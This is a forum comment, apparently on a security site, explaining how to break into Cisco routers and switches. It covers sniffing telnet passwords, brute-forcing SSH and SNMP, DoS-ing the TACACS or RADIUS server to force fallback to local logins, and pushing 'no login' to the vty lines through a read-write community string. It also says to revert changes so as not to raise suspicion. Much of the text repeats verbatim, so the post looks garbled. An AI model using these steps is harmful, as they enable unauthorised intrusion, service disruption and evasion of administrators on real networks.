you're right, with the rw community string you can change anything you want, including the passwords. you'd have to change the passwords back if you don't want to raise suspicion. However.. many times you will find that you have to modify the access list in order to allow yourself to use snmp. If you're not it that specific list, you might get the wrongful impression that the router (or switch) isn't running snmp at all.
ultimately, you want an actual session with the router. there are many things about a network you can't find out by just viewing configs.
the easiest way to gain telnet access would be to put a sniffer somewhere on the network, given that usernames and passwords are send in plain text via telnet. now days, many corporate networks run wireless via modules that are a direct part of the cisco devices. there's a good chance a wireless sniffer would come up with an admin talking to his router if you leave it on long enough.
if telnet is not configured on the device, but ssh is... brute force will have to do.
also, many times, you will run into a device that only has a read-only community string, no a read/write. in this case, brute force will have to do. (you'll rarely find one of those easily decryptable passwords anymore)
Like the article said, you may run into problems if there is a parent server (tacacs or radius) providing authentication. depending on your scenario (if you can view the config, but can't gain access), you could try a DoS attack on that server (the WAN killer that is a part of solarwinds works nicely). If you attempt a login to a router and it can not reach it's authentication server, it will most likely revert to a local username and password that the admin has configured.
however, if you do come across a read/write community string. the little "line vty 0 4" at the bottom of the config file is the virtual terminal config (telnet or ssh). you can upload the following to the device;
line vty 0 4
no login
now you telnet in to the device and you won't be asked to authenticate yourself... you'll just be given access. when you're finished,
line vty 0 4
login
and all is back to normal, no passwords changed, no brute forcing.
ultimately, you want an actual session with the router. there are many things about a network you can't find out by just viewing configs.
the easiest way to gain telnet access would be to put a sniffer somewhere on the network, given that usernames and passwords are send in plain text via telnet. now days, many corporate networks run wireless via modules that are a direct part of the cisco devices. there's a good chance a wireless sniffer would come up with an admin talking to his router if you leave it on long enough.
if telnet is not configured on the device, but ssh is... brute force will have to do.
also, many times, you will run into a device that only has a read-only community string, no a read/write. in this case, brute force will have to do. (you'll rarely find one of those easily decryptable passwords anymore)
Like the article said, you may run into problems if there is a parent server (tacacs or radius) providing authentication. depending on your scenario (if you can view the config, but can't gain access), you could try a DoS attack on that server (the WAN killer that is a part of solarwinds works nicely). If you attempt a login to a router and it can not reach it's authentication server, it will most likely revert to a local username and password that the admin has configured.
however, if you do come across a read/write community string. the little "line vty 0 4" at the bottom of the config file is the virtual terminal config (telnet or ssh). you can upload the following to the device;
line vty 0 4
no login
now you telnet in to the device and you won't be asked to authenticate yourself... you'll just be given access. when you're finished,
line vty 0 4
login
and all is back to normal, no passwords changed, no brute forcing.
sorry... i'm rambling
[ reply ]
Link to this comment: http://www.securityfocus.com/comments/infocus/1749/1048#1048